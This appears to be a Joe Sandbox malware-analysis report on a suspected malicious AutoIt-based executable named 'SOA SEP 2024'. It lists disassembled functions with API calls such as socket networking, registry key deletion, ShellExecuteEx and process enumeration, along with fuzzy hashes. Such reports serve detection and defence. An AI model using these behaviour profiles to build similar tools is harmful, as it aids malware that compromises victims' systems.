Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: ef5a9ba0e7846c4e90878db7cb85b9aa0a9cb57ba2fddd5cd5077d4d0b8a7ff8
Instruction ID: cc49ff11ea5e7b0cdf9a4f568898410e0db792a12b6ed8bda011e5a188ea49f2
Opcode Fuzzy Hash: ef5a9ba0e7846c4e90878db7cb85b9aa0a9cb57ba2fddd5cd5077d4d0b8a7ff8
Instruction Fuzzy Hash: BE916B71604201EFCB11EF14C895F6EB7E5EF98310F04885DF99A9B292DB39E906CB52

Function 007B95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 007B9691
WSAGetLastError.WSOCK32(00000000), ref: 007B969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 007B96C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007B96E9
WSAGetLastError.WSOCK32(00000000), ref: 007B96F8
htons.WSOCK32(?,?,?,00000000,?), ref: 007B97AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,007FDC00), ref: 007B9765

Part of subcall function 0079D2FF: _strlen.LIBCMT ref: 0079D309

_strlen.LIBCMT ref: 007B9800

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: a52e500f16aaeec805f93b845d26dac5cdbc58705a3f165a47f7b8a24656a969
Instruction ID: 804dc86fdbaec33ce2ec8d79630118450ae38f1853c8c838ab3418d61d59c3ef
Opcode Fuzzy Hash: a52e500f16aaeec805f93b845d26dac5cdbc58705a3f165a47f7b8a24656a969
Instruction Fuzzy Hash: F181AF71504240EFC724EF64CC89FABB7E8EB89714F104619FA5A9B1A1EB38DD04CB91

Function 0078A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0078A991

Part of subcall function 00787D7C: __FF_MSGBANNER.LIBCMT ref: 00787D91
Part of subcall function 00787D7C: __NMSG_WRITE.LIBCMT ref: 00787D98
Part of subcall function 00787D7C: __malloc_crt.LIBCMT ref: 00787DB8

__lock.LIBCMT ref: 0078A9A4
__lock.LIBCMT ref: 0078A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00816DE0,00000018,00795E7B,?,00000000,00000109), ref: 0078AA0C
EnterCriticalSection.KERNEL32(8000000C,00816DE0,00000018,00795E7B,?,00000000,00000109), ref: 0078AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0078AA39

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 720ff564c0104e9b911183a296da3087c9a41d966691f3c23f4e2d4a0ae402f7
Instruction ID: 8fc15efc1602e6709d93718e18158ac499eb8bae84e1117f1e622c7262d76b0f
Opcode Fuzzy Hash: 720ff564c0104e9b911183a296da3087c9a41d966691f3c23f4e2d4a0ae402f7
Instruction Fuzzy Hash: A2411C71980205EBFB28AF68D94475CBBA0BF05335F10C21AE425AF6D1D77D9941CB93

Function 007C8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007C8EE4
GetDC.USER32(00000000), ref: 007C8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C8EF7
ReleaseDC.USER32(00000000,00000000), ref: 007C8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 007C8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007CBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 007C8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C8FAA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 9d6fd5fe435e6cf1a20bb086d321405b537796a37a7517542a829f8987c48cb6
Instruction ID: 526de7e580c0f0164412b00a862af31aaa1381b12bd02ce257d1d085c1a0989a
Opcode Fuzzy Hash: 9d6fd5fe435e6cf1a20bb086d321405b537796a37a7517542a829f8987c48cb6
Instruction Fuzzy Hash: B4314D72101254BFEB218F50CC89FEA3BA9EF49755F084069FE099E191D6B99C41CB74

Function 007B16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

Part of subcall function 0077C6F4: _wcscpy.LIBCMT ref: 0077C717

_wcstok.LIBCMT ref: 007B184E
_wcscpy.LIBCMT ref: 007B18DD
_memset.LIBCMT ref: 007B1910

Strings

X, xrefs: 007B1948

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: ec1f98e86698077b83f3eb8ac4b0bab565a896bfc836f8a1c7149e86ef0b4d13
Instruction ID: edcf1b94f6ddbaab7c341b7552457ef853c34c855f7c771ffa8f38c29b7a364e
Opcode Fuzzy Hash: ec1f98e86698077b83f3eb8ac4b0bab565a896bfc836f8a1c7149e86ef0b4d13
Instruction Fuzzy Hash: C2C18471604340DFC724EF24C899A9AB7E4FF45350F44892DF99A972A2DB38ED45CB82

Function 007D0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

GetSystemMetrics.USER32(0000000F), ref: 007D016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 007D038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007D03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 007D03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007D03FF
ShowWindow.USER32(00000003,00000000), ref: 007D0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 007D0440

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 17014986bf14b6d0f6f9010028d92397b6b03a85b8ffcab28617d7a98b8da07b
Instruction ID: 053f694303994e544ad33132f4f5c851a80f2a68ebda2cd62d52cad5f4864767
Opcode Fuzzy Hash: 17014986bf14b6d0f6f9010028d92397b6b03a85b8ffcab28617d7a98b8da07b
Instruction Fuzzy Hash: 76A19C35600616EFDB18CF68C9897BEBBB1BF48740F14911AED54AB390D778AD60CB90

Function 0077AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a246067630dbbcd672308bfaa3dc115ca26f91edbf8cfd65fe44ce1726dd11b
Instruction ID: 5d79a740944bfac43640d81e0ed00f5e5f621e7e166f54e71cdedb536e6d4069
Opcode Fuzzy Hash: 5a246067630dbbcd672308bfaa3dc115ca26f91edbf8cfd65fe44ce1726dd11b
Instruction Fuzzy Hash: 82717AB0900109FFDF15CF98CC89AAEBB74FF89354F24C159F919AA250C338AA01CB65

Function 007C2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C225A
_memset.LIBCMT ref: 007C2323
ShellExecuteExW.SHELL32(?), ref: 007C2368

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

Part of subcall function 0077C6F4: _wcscpy.LIBCMT ref: 0077C717

CloseHandle.KERNEL32(00000000), ref: 007C242F
FreeLibrary.KERNEL32(00000000), ref: 007C243E

Strings

@, xrefs: 007C2334

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 5f3a308709e4f6be88e2dd251adf786aa179ac7aeda4340cb1ba425e4fbf2e3e
Instruction ID: 0a83d603fb50fc3507fabeb7186cc5bbaa07afedb4b96709c7c8295d39249200
Opcode Fuzzy Hash: 5f3a308709e4f6be88e2dd251adf786aa179ac7aeda4340cb1ba425e4fbf2e3e
Instruction Fuzzy Hash: 67716A74A00619DFCF15EFA4C885A9EB7B5FF48310F10805DE85AAB352DB38AE41CB94

Function 007A3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007A3C02
GetKeyboardState.USER32(?), ref: 007A3C17
SetKeyboardState.USER32(?), ref: 007A3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A3D26

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b0a84791e2b2557111fbd0bd73eb6bf421a7336417465cadb5229815fa02e87c
Instruction ID: 0741f2f2f32237656ef343f948e019919828c9b47a30bb4b92956c266531f79a
Opcode Fuzzy Hash: b0a84791e2b2557111fbd0bd73eb6bf421a7336417465cadb5229815fa02e87c
Instruction Fuzzy Hash: 7F51F9A16047D57DFB324B34CC45BB6BFA95B87300F088689F0D55A8C2D29DEE94E760

Function 007C3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 007C3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C3DCB
FreeLibrary.KERNEL32(00000000), ref: 007C3E80

Part of subcall function 007C3D72: RegCloseKey.ADVAPI32(?), ref: 007C3DE8
Part of subcall function 007C3D72: FreeLibrary.KERNEL32(?), ref: 007C3E3A
Part of subcall function 007C3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 007C3E25

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 73b78ed4cb9fe85b1bc7430bbb224238fbcf494fb881317c07ec33da06478a77
Instruction ID: 756e90d434b957d08176f07da27ecd3f6640a94d06e322781580def7b0b87102
Opcode Fuzzy Hash: 73b78ed4cb9fe85b1bc7430bbb224238fbcf494fb881317c07ec33da06478a77
Instruction Fuzzy Hash: F631EAB1901109BFDB159B94DC89EFFB7BCEB08300F04816EE512A6151E7789F899BA4

Function 007C8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007C8FE7
GetWindowLongW.USER32(00D3E1A8,000000F0), ref: 007C901A
GetWindowLongW.USER32(00D3E1A8,000000F0), ref: 007C904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007C9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007C90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 007C90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007C90D6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 0de565594c5d0b462e7677e1778dc6afbe1aa9267ad656b1607381a7115fe470
Instruction ID: 8f0d16ff10cf1254e0808db2928ee66610d7a60ce8d7be195af71fc0a8391e84
Opcode Fuzzy Hash: 0de565594c5d0b462e7677e1778dc6afbe1aa9267ad656b1607381a7115fe470
Instruction Fuzzy Hash: 23313534600216EFDB608F58DC88F6437A6FB5A354F24816CFA198F2B1CB79AC81CB45

Function 007A08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A0918
SysAllocString.OLEAUT32(00000000), ref: 007A091B
SysAllocString.OLEAUT32(?), ref: 007A0939
SysFreeString.OLEAUT32(?), ref: 007A0942
StringFromGUID2.OLE32(?,?,00000028), ref: 007A0967
SysAllocString.OLEAUT32(?), ref: 007A0975

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 77185d88054a53a1dc142ada7ee383ea5bef63655148fa12c12fc0b9bebf0ed7
Instruction ID: 909c6a027609381e909d32693f8f329816ac49883a74f4e4013e6a826835c53d
Opcode Fuzzy Hash: 77185d88054a53a1dc142ada7ee383ea5bef63655148fa12c12fc0b9bebf0ed7
Instruction Fuzzy Hash: F7216776601219AFAB109F78DC88DAB73ACEB4A360B00C625F919DB151D678EC458BA4

Function 007A2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 007A2485
__wcsnicmp.LIBCMT ref: 007A24A6
__wcsnicmp.LIBCMT ref: 007A24C0

Strings

#notrayicon, xrefs: 007A247D
#requireadmin, xrefs: 007A24A0
#OnAutoItStartRegister, xrefs: 007A24BA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1aebbbd34f792676c8a454396847e653fb74fa7e77edbe9ea4812d7360e88050
Instruction ID: a9d766fb6c1778a20dabb22375e3593f59959bea2be3aab4a077f23a4547c283
Opcode Fuzzy Hash: 1aebbbd34f792676c8a454396847e653fb74fa7e77edbe9ea4812d7360e88050
Instruction Fuzzy Hash: 8F216A71240251A7C631BB38DC16EBB7399EFEA310F60812AF94AD7143E65D9D53C3A1

Function 007A0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007A09F1
SysAllocString.OLEAUT32(00000000), ref: 007A09F4
SysAllocString.OLEAUT32 ref: 007A0A15
SysFreeString.OLEAUT32 ref: 007A0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 007A0A38
SysAllocString.OLEAUT32(?), ref: 007A0A46

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 73eeb4bdb19230f99757b3608e5ae09f6caba4ad6dd808668c92300953cc1f16
Instruction ID: b41dcd7fa41dbf94eda00585b03a58969217ebfa8ce6d427e8d1c8858bcd6ece
Opcode Fuzzy Hash: 73eeb4bdb19230f99757b3608e5ae09f6caba4ad6dd808668c92300953cc1f16
Instruction Fuzzy Hash: 4A217475201244AFDB109FB8DC88DAB77ECEF4E360700C625F909CB2A1E678EC418764

Function 007CA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077D1BA
Part of subcall function 0077D17C: GetStockObject.GDI32(00000011), ref: 0077D1CE
Part of subcall function 0077D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007CA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007CA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007CA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007CA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007CA360

Strings

Msctls_Progress32, xrefs: 007CA2FE

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ec8ebada18a8f0c51589599a3e78d595851b79b1e0fc0b883769a08c12d43d6d
Instruction ID: fa2a06636c3cfdeceb85b425b4df8369589c81ffd1604977f699441870195194
Opcode Fuzzy Hash: ec8ebada18a8f0c51589599a3e78d595851b79b1e0fc0b883769a08c12d43d6d
Instruction Fuzzy Hash: F41193B155011DBEEF115FA0CC85EEB7F6DFF09798F014118BA08A60A0C7769C21DBA4

Function 0077CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0077CCF6
GetWindowRect.USER32(?,?), ref: 0077CD37
ScreenToClient.USER32(?,?), ref: 0077CD5F
GetClientRect.USER32(?,?), ref: 0077CE8C
GetWindowRect.USER32(?,?), ref: 0077CEA5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: a0d91c9b45b3783c3c9743b74e12bd0f88de11aeeed6837c59442870b56ac847
Instruction ID: 60233030d81cedb779be2a641562ba0b04c86013de15c9c6e1c285684310138a
Opcode Fuzzy Hash: a0d91c9b45b3783c3c9743b74e12bd0f88de11aeeed6837c59442870b56ac847
Instruction Fuzzy Hash: ECB13A79A00249DBDF11CFA8C5807EDBBB1FF08350F14D56AEC59AB250DB78AA50CB64

Function 007C1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007C1C18
Process32FirstW.KERNEL32(00000000,?), ref: 007C1C26
__wsplitpath.LIBCMT ref: 007C1C54

Part of subcall function 00781DFC: __wsplitpath_helper.LIBCMT ref: 00781E3C

_wcscat.LIBCMT ref: 007C1C69
Process32NextW.KERNEL32(00000000,?), ref: 007C1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 007C1CF1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

